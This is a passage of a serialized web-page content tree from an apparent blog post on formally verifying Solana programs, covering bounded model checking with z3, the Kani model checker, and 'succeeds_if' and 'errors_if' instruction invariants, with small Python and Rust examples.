slack-dark",[23423],{"type":25,"tag":82,"props":23424,"children":23425},{"__ignoreMap":7},[23426,23449,23456,23482,23506,23530,23537,23545,23562,23590,23609,23637,23644,23652,23673,23691,23698,23706,23721,23748,23767,23794,23801,23808,23827],{"type":25,"tag":216,"props":23427,"children":23428},{"class":6922,"line":6923},[23429,23434,23439,23444],{"type":25,"tag":216,"props":23430,"children":23431},{"style":6973},[23432],{"type":31,"value":23433},"from",{"type":25,"tag":216,"props":23435,"children":23436},{"style":6964},[23437],{"type":31,"value":23438}," z3 ",{"type":25,"tag":216,"props":23440,"children":23441},{"style":6973},[23442],{"type":31,"value":23443},"import",{"type":25,"tag":216,"props":23445,"children":23446},{"style":6953},[23447],{"type":31,"value":23448}," *\n",{"type":25,"tag":216,"props":23450,"children":23451},{"class":6922,"line":6769},[23452],{"type":25,"tag":216,"props":23453,"children":23454},{"emptyLinePlaceholder":16},[23455],{"type":31,"value":7642},{"type":25,"tag":216,"props":23457,"children":23458},{"class":6922,"line":6778},[23459,23464,23468,23473,23478],{"type":25,"tag":216,"props":23460,"children":23461},{"style":6964},[23462],{"type":31,"value":23463},"x ",{"type":25,"tag":216,"props":23465,"children":23466},{"style":6953},[23467],{"type":31,"value":266},{"type":25,"tag":216,"props":23469,"children":23470},{"style":6964},[23471],{"type":31,"value":23472}," Int(",{"type":25,"tag":216,"props":23474,"children":23475},{"style":8205},[23476],{"type":31,"value":23477},"'x'",{"type":25,"tag":216,"props":23479,"children":23480},{"style":6964},[23481],{"type":31,"value":7107},{"type":25,"tag":216,"props":23483,"children":23484},{"class":6922,"line":7005},[23485,23489,23493,23497,23502],{"type":25,"tag":216,"props":23486,"children":23487},{"style":6964},[23488],{"type":31,"value":23269},{"type":25,"tag":216,"props":23490,"children":23491},{"style":6953},[23492],{"type":31,"value":266},{"type":25,"tag":216,"props":23494,"children":23495},{"style":6964},[23496],{"type":31,"value":23472},{"type":25,"tag":216,"props":23498,"children":23499},{"style":8205},[23500],{"type":31,"value":23501},"'y'",{"type":25,"tag":216,"props":23503,"children":23504},{"style":6964},[23505],{"type":31,"value":7107},{"type":25,"tag":216,"props":23507,"children":23508},{"class":6922,"line":7110},[23509,23513,23517,23521,23526],{"type":25,"tag":216,"props":23510,"children":23511},{"style":6964},[23512],{"type":31,"value":23310},{"type":25,"tag":216,"props":23514,"children":23515},{"style":6953},[23516],{"type":31,"value":266},{"type":25,"tag":216,"props":23518,"children":23519},{"style":6964},[23520],{"type":31,"value":23472},{"type":25,"tag":216,"props":23522,"children":23523},{"style":8205},[23524],{"type":31,"value":23525},"'z'",{"type":25,"tag":216,"props":23527,"children":23528},{"style":6964},[23529],{"type":31,"value":7107},{"type":25,"tag":216,"props":23531,"children":23532},{"class":6922,"line":7216},[23533],{"type":25,"tag":216,"props":23534,"children":23535},{"emptyLinePlaceholder":16},[23536],{"type":31,"value":7642},{"type":25,"tag":216,"props":23538,"children":23539},{"class":6922,"line":7244},[23540],{"type":25,"tag":216,"props":23541,"children":23542},{"style":6927},[23543],{"type":31,"value":23544},"# Positive branch:\n",{"type":25,"tag":216,"props":23546,"children":23547},{"class":6922,"line":7257},[23548,23553,23557],{"type":25,"tag":216,"props":23549,"children":23550},{"style":6964},[23551],{"type":31,"value":23552},"s ",{"type":25,"tag":216,"props":23554,"children":23555},{"style":6953},[23556],{"type":31,"value":266},{"type":25,"tag":216,"props":23558,"children":23559},{"style":6964},[23560],{"type":31,"value":23561}," Solver()\n",{"type":25,"tag":216,"props":23563,"children":23564},{"class":6922,"line":7275},[23565,23570,23574,23578,23582,23586],{"type":25,"tag":216,"props":23566,"children":23567},{"style":6964},[23568],{"type":31,"value":23569},"s.add(y ",{"type":25,"tag":216,"props":23571,"children":23572},{"style":6953},[23573],{"type":31,"value":12528},{"type":25,"tag":216,"props":23575,"children":23576},{"style":6964},[23577],{"type":31,"value":23050},{"type":25,"tag":216,"props":23579,"children":23580},{"style":6953},[23581],{"type":31,"value":3539},{"type":25,"tag":216,"props":23583,"children":23584},{"style":6989},[23585],{"type":31,"value":23059},{"type":25,"tag":216,"props":23587,"children":23588},{"style":6964},[23589],{"type":31,"value":7107},{"type":25,"tag":216,"props":23591,"children":23592},{"class":6922,"line":7296},[23593,23597,23601,23605],{"type":25,"tag":216,"props":23594,"children":23595},{"style":6964},[23596],{"type":31,"value":23569},{"type":25,"tag":216,"props":23598,"children":23599},{"style":6953},[23600],{"type":31,"value":5902},{"type":25,"tag":216,"props":23602,"children":23603},{"style":6989},[23604],{"type":31,"value":23096},{"type":25,"tag":216,"props":23606,"children":23607},{"style":6964},[23608],{"type":31,"value":7107},{"type":25,"tag":216,"props":23610,"children":23611},{"class":6922,"line":7305},[23612,23617,23621,23625,23629,23633],{"type":25,"tag":216,"props":23613,"children":23614},{"style":6964},[23615],{"type":31,"value":23616},"s.add(z ",{"type":25,"tag":216,"props":23618,"children":23619},{"style":6953},[23620],{"type":31,"value":12528},{"type":25,"tag":216,"props":23622,"children":23623},{"style":6964},[23624],{"type":31,"value":8462},{"type":25,"tag":216,"props":23626,"children":23627},{"style":6953},[23628],{"type":31,"value":8519},{"type":25,"tag":216,"props":23630,"children":23631},{"style":6989},[23632],{"type":31,"value":11886},{"type":25,"tag":216,"props":23634,"children":23635},{"style":6964},[23636],{"type":31,"value":7107},{"type":25,"tag":216,"props":23638,"children":23639},{"class":6922,"line":7557},[23640],{"type":25,"tag":216,"props":23641,"children":23642},{"emptyLinePlaceholder":16},[23643],{"type":31,"value":7642},{"type":25,"tag":216,"props":23645,"children":23646},{"class":6922,"line":7574},[23647],{"type":25,"tag":216,"props":23648,"children":23649},{"style":6927},[23650],{"type":31,"value":23651},"# check if we can violate the correctness property\n",{"type":25,"tag":216,"props":23653,"children":23654},{"class":6922,"line":7591},[23655,23660,23664,23668],{"type":25,"tag":216,"props":23656,"children":23657},{"style":6964},[23658],{"type":31,"value":23659},"s.add(Not(z ",{"type":25,"tag":216,"props":23661,"children":23662},{"style":6953},[23663],{"type":31,"value":19646},{"type":25,"tag":216,"props":23665,"children":23666},{"style":6989},[23667],{"type":31,"value":23214},{"type":25,"tag":216,"props":23669,"children":23670},{"style":6964},[23671],{"type":31,"value":23672},"))\n",{"type":25,"tag":216,"props":23674,"children":23675},{"class":6922,"line":7604},[23676,23681,23686],{"type":25,"tag":216,"props":23677,"children":23678},{"style":7047},[23679],{"type":31,"value":23680},"print",{"type":25,"tag":216,"props":23682,"children":23683},{"style":6964},[23684],{"type":31,"value":23685},"(s.check()) ",{"type":25,"tag":216,"props":23687,"children":23688},{"style":6927},[23689],{"type":31,"value":23690},"# \"unsat\"\n",{"type":25,"tag":216,"props":23692,"children":23693},{"class":6922,"line":7613},[23694],{"type":25,"tag":216,"props":23695,"children":23696},{"emptyLinePlaceholder":16},[23697],{"type":31,"value":7642},{"type":25,"tag":216,"props":23699,"children":23700},{"class":6922,"line":7636},[23701],{"type":25,"tag":216,"props":23702,"children":23703},{"style":6927},[23704],{"type":31,"value":23705},"# Negative branch:\n",{"type":25,"tag":216,"props":23707,"children":23708},{"class":6922,"line":7645},[23709,23713,23717],{"type":25,"tag":216,"props":23710,"children":23711},{"style":6964},[23712],{"type":31,"value":23552},{"type":25,"tag":216,"props":23714,"children":23715},{"style":6953},[23716],{"type":31,"value":266},{"type":25,"tag":216,"props":23718,"children":23719},{"style":6964},[23720],{"type":31,"value":23561},{"type":25,"tag":216,"props":23722,"children":23723},{"class":6922,"line":7654},[23724,23728,23732,23736,23740,23744],{"type":25,"tag":216,"props":23725,"children":23726},{"style":6964},[23727],{"type":31,"value":23569},{"type":25,"tag":216,"props":23729,"children":23730},{"style":6953},[23731],{"type":31,"value":12528},{"type":25,"tag":216,"props":23733,"children":23734},{"style":6964},[23735],{"type":31,"value":23050},{"type":25,"tag":216,"props":23737,"children":23738},{"style":6953},[23739],{"type":31,"value":3539},{"type":25,"tag":216,"props":23741,"children":23742},{"style":6989},[23743],{"type":31,"value":23059},{"type":25,"tag":216,"props":23745,"children":23746},{"style":6964},[23747],{"type":31,"value":7107},{"type":25,"tag":216,"props":23749,"children":23750},{"class":6922,"line":7722},[23751,23755,23759,23763],{"type":25,"tag":216,"props":23752,"children":23753},{"style":6964},[23754],{"type":31,"value":23569},{"type":25,"tag":216,"props":23756,"children":23757},{"style":6953},[23758],{"type":31,"value":23374},{"type":25,"tag":216,"props":23760,"children":23761},{"style":6989},[23762],{"type":31,"value":23096},{"type":25,"tag":216,"props":23764,"children":23765},{"style":6964},[23766],{"type":31,"value":7107},{"type":25,"tag":216,"props":23768,"children":23769},{"class":6922,"line":7730},[23770,23774,23778,23782,23786,23790],{"type":25,"tag":216,"props":23771,"children":23772},{"style":6964},[23773],{"type":31,"value":23616},{"type":25,"tag":216,"props":23775,"children":23776},{"style":6953},[23777],{"type":31,"value":12528},{"type":25,"tag":216,"props":23779,"children":23780},{"style":6964},[23781],{"type":31,"value":8462},{"type":25,"tag":216,"props":23783,"children":23784},{"style":6953},[23785],{"type":31,"value":3539},{"type":25,"tag":216,"props":23787,"children":23788},{"style":6989},[23789],{"type":31,"value":8471},{"type":25,"tag":216,"props":23791,"children":23792},{"style":6964},[23793],{"type":31,"value":7107},{"type":25,"tag":216,"props":23795,"children":23796},{"class":6922,"line":7760},[23797],{"type":25,"tag":216,"props":23798,"children":23799},{"emptyLinePlaceholder":16},[23800],{"type":31,"value":7642},{"type":25,"tag":216,"props":23802,"children":23803},{"class":6922,"line":7768},[23804],{"type":25,"tag":216,"props":23805,"children":23806},{"style":6927},[23807],{"type":31,"value":23651},{"type":25,"tag":216,"props":23809,"children":23810},{"class":6922,"line":7800},[23811,23815,23819,23823],{"type":25,"tag":216,"props":23812,"children":23813},{"style":6964},[23814],{"type":31,"value":23659},{"type":25,"tag":216,"props":23816,"children":23817},{"style":6953},[23818],{"type":31,"value":19646},{"type":25,"tag":216,"props":23820,"children":23821},{"style":6989},[23822],{"type":31,"value":23214},{"type":25,"tag":216,"props":23824,"children":23825},{"style":6964},[23826],{"type":31,"value":23672},{"type":25,"tag":216,"props":23828,"children":23829},{"class":6922,"line":7808},[23830,23834,23838],{"type":25,"tag":216,"props":23831,"children":23832},{"style":7047},[23833],{"type":31,"value":23680},{"type":25,"tag":216,"props":23835,"children":23836},{"style":6964},[23837],{"type":31,"value":23685},{"type":25,"tag":216,"props":23839,"children":23840},{"style":6927},[23841],{"type":31,"value":23690},{"type":25,"tag":38,"props":23843,"children":23844},{},[23845,23847,23853,23855,23860],{"type":31,"value":23846},"Both of these cases return ",{"type":25,"tag":82,"props":23848,"children":23850},{"className":23849},[],[23851],{"type":31,"value":23852},"unsat",{"type":31,"value":23854}," meaning z3 could not find a way to violate the correctness property, hence our program is ",{"type":25,"tag":64,"props":23856,"children":23857},{},[23858],{"type":31,"value":23859},"correct",{"type":31,"value":23861}," according to this property.",{"type":25,"tag":606,"props":23863,"children":23865},{"id":23864},"loop-bounds-path-explosion",[23866],{"type":31,"value":23867},"Loop bounds & path explosion",{"type":25,"tag":38,"props":23869,"children":23870},{},[23871,23873,23878,23880,23885],{"type":31,"value":23872},"As you may have noticed, BMC requires us to take ",{"type":25,"tag":64,"props":23874,"children":23875},{},[23876],{"type":31,"value":23877},"every",{"type":31,"value":23879}," branch in the program. To be sure that our property holds, we need to check every possible route through the program. If we have 10 branches in a row we might need to test 2^10 paths! And if our program has loops, we may need to check an ",{"type":25,"tag":64,"props":23881,"children":23882},{},[23883],{"type":31,"value":23884},"infinite",{"type":31,"value":23886}," number of paths because the loop branches backward. This might take a while...",{"type":25,"tag":38,"props":23888,"children":23889},{},[23890],{"type":31,"value":23891},"This is where the \"bounded\" part of \"bounded model checking\" applies. Rather than unroll an infinite number of loops, we can set a loop bound and also verify that it is not possible to loop more than the loop bound.",{"type":25,"tag":38,"props":23893,"children":23894},{},[23895],{"type":31,"value":23896},"While this technique of bounding loops makes the problem tractable. It is still expensive to run BMC on very large programs due to the problem of path explosion. As our program gets larger, the number of possible paths scales potentially exponentially.",{"type":25,"tag":38,"props":23898,"children":23899},{},[23900],{"type":31,"value":23901},"One of the main challenges we will discuss later is how to address this problem of path explosion in the context of Solana Rust programs.",{"type":25,"tag":606,"props":23903,"children":23905},{"id":23904},"kani-model-checker",[23906],{"type":31,"value":23907},"Kani Model Checker",{"type":25,"tag":38,"props":23909,"children":23910},{},[23911,23913,23918],{"type":31,"value":23912},"For our research with formally verifying Solana programs, we are using the ",{"type":25,"tag":162,"props":23914,"children":23916},{"href":22807,"rel":23915},[166],[23917],{"type":31,"value":22811},{"type":31,"value":23919},": an open-source, bit-precise model checker for Rust created at AWS. Under the hood, Kani uses the C Bounded Model Checker (CBMC) to do the heavy lifting.",{"type":25,"tag":38,"props":23921,"children":23922},{},[23923,23925,23930,23932,23938,23939,23945,23947,23953],{"type":31,"value":23924},"Kani allows you to write ",{"type":25,"tag":64,"props":23926,"children":23927},{},[23928],{"type":31,"value":23929},"proof harnesses",{"type":31,"value":23931}," which can invoke Rust functions with symbolic values. These harnesses can ",{"type":25,"tag":82,"props":23933,"children":23935},{"className":23934},[],[23936],{"type":31,"value":23937},"assume",{"type":31,"value":1307},{"type":25,"tag":82,"props":23940,"children":23942},{"className":23941},[],[23943],{"type":31,"value":23944},"assert",{"type":31,"value":23946}," certain conditions about these symbolic values and then you can verify that a proof harness holds via the ",{"type":25,"tag":82,"props":23948,"children":23950},{"className":23949},[],[23951],{"type":31,"value":23952},"cargo kani",{"type":31,"value":23954}," tool (which compiles your proof harness and runs BMC).",{"type":25,"tag":26,"props":23956,"children":23958},{"id":23957},"specification-how-can-we-describe-what-we-want-our-program-to-do",[23959,23961,23965],{"type":31,"value":23960},"Specification: How can we describe what we ",{"type":25,"tag":64,"props":23962,"children":23963},{},[23964],{"type":31,"value":22880},{"type":31,"value":22882},{"type":25,"tag":38,"props":23967,"children":23968},{},[23969],{"type":25,"tag":64,"props":23970,"children":23971},{},[23972],{"type":25,"tag":9273,"props":23973,"children":23974},{},[23975],{"type":31,"value":23976},"And what even do we want it to do?",{"type":25,"tag":38,"props":23978,"children":23979},{},[23980,23982,23987],{"type":31,"value":23981},"A fundamental challenge with any formal verification framework is ",{"type":25,"tag":64,"props":23983,"children":23984},{},[23985],{"type":31,"value":23986},"specifying",{"type":31,"value":23988}," what the \"correct\" behavior should be.",{"type":25,"tag":38,"props":23990,"children":23991},{},[23992],{"type":31,"value":23993},"In natural language, we can describe a few good properties for example Solana programs:",{"type":25,"tag":2039,"props":23995,"children":23996},{},[23997,24009,24021],{"type":25,"tag":2043,"props":23998,"children":23999},{},[24000,24002,24007],{"type":31,"value":24001},"\"It should not be possible to ",{"type":25,"tag":9273,"props":24003,"children":24004},{},[24005],{"type":31,"value":24006},"steal money",{"type":31,"value":24008}," via a swap program\"",{"type":25,"tag":2043,"props":24010,"children":24011},{},[24012,24014,24019],{"type":31,"value":24013},"\"A multisig should never get into a state where you ",{"type":25,"tag":9273,"props":24015,"children":24016},{},[24017],{"type":31,"value":24018},"can't sign anything",{"type":31,"value":24020},"\"",{"type":25,"tag":2043,"props":24022,"children":24023},{},[24024],{"type":31,"value":24025},"\"User funds in a staking protocol \"",{"type":25,"tag":38,"props":24027,"children":24028},{},[24029,24031,24041,24043,24048],{"type":31,"value":24030},"These are types of properties you can tell your ",{"type":25,"tag":162,"props":24032,"children":24035},{"href":24033,"rel":24034},"https://osec.io/",[166],[24036],{"type":25,"tag":64,"props":24037,"children":24038},{},[24039],{"type":31,"value":24040},"human auditors",{"type":31,"value":24042}," but these English phrases are not particularly useful for ",{"type":25,"tag":64,"props":24044,"children":24045},{},[24046],{"type":31,"value":24047},"automated verification techniques",{"type":31,"value":24049}," (at least until our AI overlords surpass human intelligence).",{"type":25,"tag":38,"props":24051,"children":24052},{},[24053,24055,24060,24062,24067],{"type":31,"value":24054},"Instead, we need to be able to specify ",{"type":25,"tag":64,"props":24056,"children":24057},{},[24058],{"type":31,"value":24059},"in code",{"type":31,"value":24061}," what properties we want to check. Ideally, we could define invariants that fit nicely into something like an ",{"type":25,"tag":82,"props":24063,"children":24065},{"className":24064},[],[24066],{"type":31,"value":23944},{"type":31,"value":24068}," statement.",{"type":25,"tag":606,"props":24070,"children":24072},{"id":24071},"solana-invariants",[24073],{"type":31,"value":24074},"Solana Invariants",{"type":25,"tag":38,"props":24076,"children":24077},{},[24078,24080,24085,24086,24091],{"type":31,"value":24079},"In the context of Solana programs we define two different types of properties that we would like to verify: ",{"type":25,"tag":9273,"props":24081,"children":24082},{},[24083],{"type":31,"value":24084},"instruction invariants",{"type":31,"value":1307},{"type":25,"tag":9273,"props":24087,"children":24088},{},[24089],{"type":31,"value":24090},"account invariants",{"type":31,"value":179},{"type":25,"tag":630,"props":24093,"children":24095},{"id":24094},"instruction-invariant",[24096],{"type":31,"value":24097},"Instruction Invariant",{"type":25,"tag":38,"props":24099,"children":24100},{},[24101,24103,24108,24110,24116,24117,24123],{"type":31,"value":24102},"An ",{"type":25,"tag":9273,"props":24104,"children":24105},{},[24106],{"type":31,"value":24107},"instruction invariant",{"type":31,"value":24109}," specifies sufficient conditions for an instruction to succeed (or fail). These are specified as ",{"type":25,"tag":82,"props":24111,"children":24113},{"className":24112},[],[24114],{"type":31,"value":24115},"succeeds_if",{"type":31,"value":17090},{"type":25,"tag":82,"props":24118,"children":24120},{"className":24119},[],[24121],{"type":31,"value":24122},"errors_if",{"type":31,"value":24124}," macro annotations on the instruction handler.",{"type":25,"tag":38,"props":24126,"children":24127},{},[24128],{"type":31,"value":24129},"In Solana, when an instruction fails, the entire transaction is reverted. Failing an instruction on purpose is commonly used as a form of access control; invalid accounts, bad state, etc... will cause an instruction to fail and get reverted.",{"type":25,"tag":38,"props":24131,"children":24132},{},[24133,24135,24141,24143,24147],{"type":31,"value":24134},"For example, say we have a ",{"type":25,"tag":82,"props":24136,"children":24138},{"className":24137},[],[24139],{"type":31,"value":24140},"Withdraw",{"type":31,"value":24142}," instruction that lets a user withdraw some tokens. A security critical property we may want to verify is that the user cannot withdraw ",{"type":25,"tag":64,"props":24144,"children":24145},{},[24146],{"type":31,"value":6534},{"type":31,"value":24148}," tokens than their current balance.",{"type":25,"tag":38,"props":24150,"children":24151},{},[24152,24154,24159],{"type":31,"value":24153},"Using our tool, you could specify the following ",{"type":25,"tag":82,"props":24155,"children":24157},{"className":24156},[],[24158],{"type":31,"value":24122},{"type":31,"value":24160}," property on your instruction handler:",{"type":25,"tag":206,"props":24162,"children":24164},{"code":24163,"language":6914,"meta":7,"className":6915,"style":7},"#[errors_if(\n    ctx.user.balance \u003C amount\n)]\nfn withdraw(ctx: Context\u003CWithdraw>, amount: u64) -> Result\u003C()> {\n    ...\n}\n",[24165],{"type":25,"tag":82,"props":24166,"children":24167},{"__ignoreMap":7},[24168,24176,24211,24219,24292,24300],{"type":25,"tag":216,"props":24169,"children":24170},{"class":6922,"line":6923},[24171],{"type":25,"tag":216,"props":24172,"children":24173},{"style":6964},[24174],{"type":31,"value":24175},"#[errors_if(\n",{"type":25,"tag":216,"props":24177,"children":24178},{"class":6922,"line":6769},[24179,24184,24188,24193,24197,24202,24206],{"type":25,"tag":216,"props":24180,"children":24181},{"style":6964},[24182],{"type":31,"value":24183},"    ctx",{"type":25,"tag":216,"props":24185,"children":24186},{"style":6953},[24187],{"type":31,"value":179},{"type":25,"tag":216,"props":24189,"children":24190},{"style":6964},[24191],{"type":31,"value":24192},"user",{"type":25,"tag":216,"props":24194,"children":24195},{"style":6953},[24196],{"type":31,"value":179},{"type":25,"tag":216,"props":24198,"children":24199},{"style":6964},[24200],{"type":31,"value":24201},"balance ",{"type":25,"tag":216,"props":24203,"children":24204},{"style":6953},[24205],{"type":31,"value":9757},{"type":25,"tag":216,"props":24207,"children":24208},{"style":6964},[24209],{"type":31,"value":24210}," amount\n",{"type":25,"tag":216,"props":24212,"children":24213},{"class":6922,"line":6778},[24214],{"type":25,"tag":216,"props":24215,"children":24216},{"style":6964},[24217],{"type":31,"value":24218},")]\n",{"type":25,"tag":216,"props":24220,"children":24221},{"class":6922,"line":7005},[24222,24227,24232,24236,24241,24245,24250,24254,24258,24262,24267,24271,24275,24279,24283,24287],{"type":25,"tag":216,"props":24223,"children":24224},{"style":6936},[24225],{"type":31,"value":24226},"fn",{"type":25,"tag":216,"props":24228,"children":24229},{"style":7047},[24230],{"type":31,"value":24231}," withdraw",{"type":25,"tag":216,"props":24233,"children":24234},{"style":6964},[24235],{"type":31,"value":1850},{"type":25,"tag":216,"props":24237,"children":24238},{"style":6947},[24239],{"type":31,"value":24240},"ctx",{"type":25,"tag":216,"props":24242,"children":24243},{"style":6953},[24244],{"type":31,"value":1472},{"type":25,"tag":216,"props":24246,"children":24247},{"style":7375},[24248],{"type":31,"value":24249}," Context",{"type":25,"tag":216,"props":24251,"children":24252},{"style":6964},[24253],{"type":31,"value":9757},{"type":25,"tag":216,"props":24255,"children":24256},{"style":7375},[24257],{"type":31,"value":24140},{"type":25,"tag":216,"props":24259,"children":24260},{"style":6964},[24261],{"type":31,"value":10582},{"type":25,"tag":216,"props":24263,"children":24264},{"style":6947},[24265],{"type":31,"value":24266},"amount",{"type":25,"tag":216,"props":24268,"children":24269},{"style":6953},[24270],{"type":31,"value":1472},{"type":25,"tag":216,"props":24272,"children":24273},{"style":7375},[24274],{"type":31,"value":9811},{"type":25,"tag":216,"props":24276,"children":24277},{"style":6964},[24278],{"type":31,"value":7036},{"type":25,"tag":216,"props":24280,"children":24281},{"style":6953},[24282],{"type":31,"value":17714},{"type":25,"tag":216,"props":24284,"children":24285},{"style":7375},[24286],{"type":31,"value":17719},{"type":25,"tag":216,"props":24288,"children":24289},{"style":6964},[24290],{"type":31,"value":24291},"\u003C()> {\n",{"type":25,"tag":216,"props":24293,"children":24294},{"class":6922,"line":7110},[24295],{"type":25,"tag":216,"props":24296,"children":24297},{"style":6953},[24298],{"type":31,"value":24299},"    ...\n",{"type":25,"tag":216,"props":24301,"children":24302},{"class":6922,"line":7216},[24303],{"type":25,"tag":216,"props":24304,"children":24305},{"style":6964},[24306],{"type":31,"value":7874},{"type":25,"tag":34,"props":24308,"children":24309},{},[24310],{"type":25,"tag":38,"props":24311,"children":24312},{},[24313,24314,24319,24321,24326,24328,24333],{"type":31,"value":474},{"type":25,"tag":82,"props":24315,"children":24317},{"className":24316},[],[24318],{"type":31,"value":24122},{"type":31,"value":24320}," expression specifies ",{"type":25,"tag":64,"props":24322,"children":24323},{},[24324],{"type":31,"value":24325},"succifient",{"type":31,"value":24327}," but not ",{"type":25,"tag":64,"props":24329,"children":24330},{},[24331],{"type":31,"value":24332},"necessary",{"type":31,"value":24334}," conditions for an instruction to fail. I.e. it imposes a strong lower bound on what the requirements are for an instruction to fail.",{"type":25,"tag":22753,"props":24336,"children":24337},{},[],{"type":25,"tag":38,"props":24339,"children":24340},{},[24341,24343,24348],{"type":31,"value":24342},"Another example is that for ",{"type":25,"tag":64,"props":24344,"children":24345},{},[24346],{"type":31,"value":24347},"crank",{"type":31,"value":24349}," functions — run by unauthenticated users to advance the state of the system, you may want to prove that they never fail. In that case, you could specify an invariant like the following:",{"type":25,"tag":206,"props":24351,"children":24353},{"code":24352,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if(true)]\nfn my_crank(ctx: Context\u003CCrank>) -> Result\u003C()> {\n    ...\n}\n",[24354],{"type":25,"tag":82,"props":24355,"children":24356},{"__ignoreMap":7},[24357,24365,24419,24426],{"type":25,"tag":216,"props":24358,"children":24359},{"class":6922,"line":6923},[24360],{"type":25,"tag":216,"props":24361,"children":24362},{"style":6964},[24363],{"type":31,"value":24364},"#[succeeds_if(true)]\n",{"type":25,"tag":216,"props":24366,"children":24367},{"class":6922,"line":6769},[24368,24372,24377,24381,24385,24389,24393,24397,24402,24407,24411,24415],{"type":25,"tag":216,"props":24369,"children":24370},{"style":6936},[24371],{"type":31,"value":24226},{"type":25,"tag":216,"props":24373,"children":24374},{"style":7047},[24375],{"type":31,"value":24376}," my_crank",{"type":25,"tag":216,"props":24378,"children":24379},{"style":6964},[24380],{"type":31,"value":1850},{"type":25,"tag":216,"props":24382,"children":24383},{"style":6947},[24384],{"type":31,"value":24240},{"type":25,"tag":216,"props":24386,"children":24387},{"style":6953},[24388],{"type":31,"value":1472},{"type":25,"tag":216,"props":24390,"children":24391},{"style":7375},[24392],{"type":31,"value":24249},{"type":25,"tag":216,"props":24394,"children":24395},{"style":6964},[24396],{"type":31,"value":9757},{"type":25,"tag":216,"props":24398,"children":24399},{"style":7375},[24400],{"type":31,"value":24401},"Crank",{"type":25,"tag":216,"props":24403,"children":24404},{"style":6964},[24405],{"type":31,"value":24406},">) ",{"type":25,"tag":216,"props":24408,"children":24409},{"style":6953},[24410],{"type":31,"value":17714},{"type":25,"tag":216,"props":24412,"children":24413},{"style":7375},[24414],{"type":31,"value":17719},{"type":25,"tag":216,"props":24416,"children":24417},{"style":6964},[24418],{"type":31,"value":24291},{"type":25,"tag":216,"props":24420,"children":24421},{"class":6922,"line":6778},[24422],{"type":25,"tag":216,"props":24423,"children":24424},{"style":6953},[24425],{"type":31,"value":24299},{"type":25,"tag":216,"props":24427,"children":24428},{"class":6922,"line":7005},[24429],{"type":25,"tag":216,"props":24430,"children":24431},{"style":6964},[24432],{"type":31,"value":7874},{"type":25,"tag":38,"props":24434,"children":24435},{},[24436,24438,24442,24444,24450],{"type":31,"value":24437},"With this invariant, you could prove that the function ",{"type":25,"tag":64,"props":24439,"children":24440},{},[24441],{"type":31,"value":17050},{"type":31,"value":24443}," returns ",{"type":25,"tag":82,"props":24445,"children":24447},{"className":24446},[],[24448],{"type":31,"value":24449},"Ok",{"type":31,"value":24451},". This type of construction could help avoid possible denial of service attacks if a crank could get \"stuck.\"",{"type":25,"tag":22753,"props":24453,"children":24454},{},[],{"type":25,"tag":38,"props":24456,"children":24457},{},[24458,24460,24465,24466,24471,24473,24478,24480,24485,24487,24492],{"type":31,"value":24459},"Note that ",{"type":25,"tag":82,"props":24461,"children":24463},{"className":24462},[],[24464],{"type":31,"value":24115},{"type":31,"value":1307},{"type":25,"tag":82,"props":24467,"children":24469},{"className":24468},[],[24470],{"type":31,"value":24122},{"type":31,"value":24472}," are both implications and not biconditionals. That is, a function may succeed even if ",{"type":25,"tag":82,"props":24474,"children":24476},{"className":24475},[],[24477],{"type":31,"value":24115},{"type":31,"value":24479}," is not satisfied and a function may fail even if ",{"type":25,"tag":82,"props":24481,"children":24483},{"className":24482},[],[24484],{"type":31,"value":24122},{"type":31,"value":24486}," is not satisfied. If you want to prove the ",{"type":25,"tag":64,"props":24488,"children":24489},{},[24490],{"type":31,"value":24491},"exact condition",{"type":31,"value":24493}," required for an instruction to succeed, you could use a form like the following:",{"type":25,"tag":206,"props":24495,"children":24497},{"code":24496,"language":6914,"meta":7,"className":6915,"style":7},"fn my_invariant(...) -> bool { ... }\n\n#[succeeds_if(my_invariant(...))]\n#[errors_if(!my_invariant(...))]\nfn my_instruction(ctx: Context\u003C...>) -> Result\u003C()> {\n    ...\n}\n",[24498],{"type":25,"tag":82,"props":24499,"children":24500},{"__ignoreMap":7},[24501,24545,24552,24569,24595,24647,24654],{"type":25,"tag":216,"props":24502,"children":24503},{"class":6922,"line":6923},[24504,24508,24513,24517,24521,24525,24529,24533,24537,24541],{"type":25,"tag":216,"props":24505,"children":24506},{"style":6936},[24507],{"type":31,"value":24226},{"type":25,"tag":216,"props":24509,"children":24510},{"style":7047},[24511],{"type":31,"value":24512}," my_invariant",{"type":25,"tag":216,"props":24514,"children":24515},{"style":6964},[24516],{"type":31,"value":1850},{"type":25,"tag":216,"props":24518,"children":24519},{"style":6953},[24520],{"type":31,"value":13547},{"type":25,"tag":216,"props":24522,"children":24523},{"style":6964},[24524],{"type":31,"value":7036},{"type":25,"tag":216,"props":24526,"children":24527},{"style":6953},[24528],{"type":31,"value":17714},{"type":25,"tag":216,"props":24530,"children":24531},{"style":7375},[24532],{"type":31,"value":16006},{"type":25,"tag":216,"props":24534,"children":24535},{"style":6964},[24536],{"type":31,"value":13542},{"type":25,"tag":216,"props":24538,"children":24539},{"style":6953},[24540],{"type":31,"value":13547},{"type":25,"tag":216,"props":24542,"children":24543},{"style":6964},[24544],{"type":31,"value":13552},{"type":25,"tag":216,"props":24546,"children":24547},{"class":6922,"line":6769},[24548],{"type":25,"tag":216,"props":24549,"children":24550},{"emptyLinePlaceholder":16},[24551],{"type":31,"value":7642},{"type":25,"tag":216,"props":24553,"children":24554},{"class":6922,"line":6778},[24555,24560,24564],{"type":25,"tag":216,"props":24556,"children":24557},{"style":6964},[24558],{"type":31,"value":24559},"#[succeeds_if(my_invariant(",{"type":25,"tag":216,"props":24561,"children":24562},{"style":6953},[24563],{"type":31,"value":13547},{"type":25,"tag":216,"props":24565,"children":24566},{"style":6964},[24567],{"type":31,"value":24568},"))]\n",{"type":25,"tag":216,"props":24570,"children":24571},{"class":6922,"line":7005},[24572,24577,24582,24587,24591],{"type":25,"tag":216,"props":24573,"children":24574},{"style":6964},[24575],{"type":31,"value":24576},"#[errors_if(",{"type":25,"tag":216,"props":24578,"children":24579},{"style":6953},[24580],{"type":31,"value":24581},"!",{"type":25,"tag":216,"props":24583,"children":24584},{"style":6964},[24585],{"type":31,"value":24586},"my_invariant(",{"type":25,"tag":216,"props":24588,"children":24589},{"style":6953},[24590],{"type":31,"value":13547},{"type":25,"tag":216,"props":24592,"children":24593},{"style":6964},[24594],{"type":31,"value":24568},{"type":25,"tag":216,"props":24596,"children":24597},{"class":6922,"line":7110},[24598,24602,24607,24611,24615,24619,24623,24627,24631,24635,24639,24643],{"type":25,"tag":216,"props":24599,"children":24600},{"style":6936},[24601],{"type":31,"v